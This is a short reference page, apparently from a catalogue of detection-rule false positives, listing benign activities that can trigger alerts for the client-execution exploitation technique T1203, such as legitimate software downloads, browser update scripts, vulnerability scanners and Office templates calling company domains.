LoFP LoFP / t1203

t1203

TitleTags
all kind of software downloads
all kinds of software downloads
blocked connection events are generated via an access control policy on the firewall management console. hence no false positives should be present.
exploits that were attempted but unsuccessful.
false positives are directly related to their snort rules triggering and the firewall scoring. apply additional filters if the rules are too noisy by disabling them or simply ignoring certain ip ranges that trigger it.
it admins or developers may legitimately download executables or scripts as part of their normal workflow. apply additional filters accordingly.
it is highly recommended to baseline your activity and tune out common business use cases.
legitimate browser install, update and recovery scripts
legitimate use of scx runasprovider executescript.
legitimate use of scx runasprovider invoke_executeshellcommand.
malicious verdicts could be outdated or incorrect due to retroactive threat intel.
misconfigured applications or automated scripts may generate repeated blocked traffic, particularly if attempting to reach decommissioned or restricted resources. vulnerability scanners or penetration testing tools running in authorized environments may trigger this alert. tuning may be required to exclude known internal tools or scanner ips from detection.
office documents commonly have templates that refer to external addresses, like \"sharepoint.ourcompany.com\" may have to be tuned.
scanning attempts with the abnormal use of the http post method with no indication of code execution within the http client (request) body. an example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. see description for investigation tips.
unlikely
you may have to tune certain domains out that excel may call out to, such as microsoft or other business use case domains.